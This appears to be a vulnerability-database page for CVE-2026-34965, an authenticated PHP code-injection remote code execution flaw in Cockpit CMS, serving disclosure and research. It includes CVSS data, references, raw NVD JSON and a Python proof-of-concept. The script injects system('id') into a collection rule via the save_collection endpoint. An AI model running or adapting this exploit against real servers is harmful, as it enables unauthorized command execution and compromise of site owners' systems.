CVE-2026-34965

Description

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cockpit CMS (Commit 494765e 之前)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://localhost:8080/cockpit/collections/save_collection"

# Authenticated session cookie (Required)
cookies = {
    "cockpit": "valid_session_token_here"
}

# Malicious payload injecting PHP code into the 'rule' parameter
# The PHP system command will be written to a file and executed
payload_data = {
    "data": {
        "name": "vulnerable_collection",
        "rules": [
            {
                # Injecting PHP code to execute 'id' command
                "rule": "system('id');"
            }
        ]
    }
}

try:
    response = requests.post(target_url, json=payload_data, cookies=cookies)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the server logs or trigger the collection include to execute the code.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34965
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34965
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34965/
[4] VulDB https://vuldb.com/cve/CVE-2026-34965
[5] https://gist.github.com/thepiyushkumarshukla/64d2318518b17f529bc3ccb11fd5be90
[6] https://github.com/agentejo/cockpit
[7] https://github.com/agentejo/cockpit/commits/494765e4f0fb9484f320aee0c6ee889b6fa789b9
[8] https://www.vulncheck.com/advisories/cockpit-cms-authenticated-remote-code-execution-via-collections

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34965", "sourceIdentifier": "[email protected]", "published": "2026-04-29T20:16:29.923", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://gist.github.com/thepiyushkumarshukla/64d2318518b17f529bc3ccb11fd5be90", "source": "[email protected]"}, {"url": "https://github.com/agentejo/cockpit", "source": "[email protected]"}, {"url": "https://github.com/agentejo/cockpit/commits/494765e4f0fb9484f320aee0c6ee889b6fa789b9", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/cockpit-cms-authenticated-remote-code-execution-via-collections", "source": "[email protected]"}]}}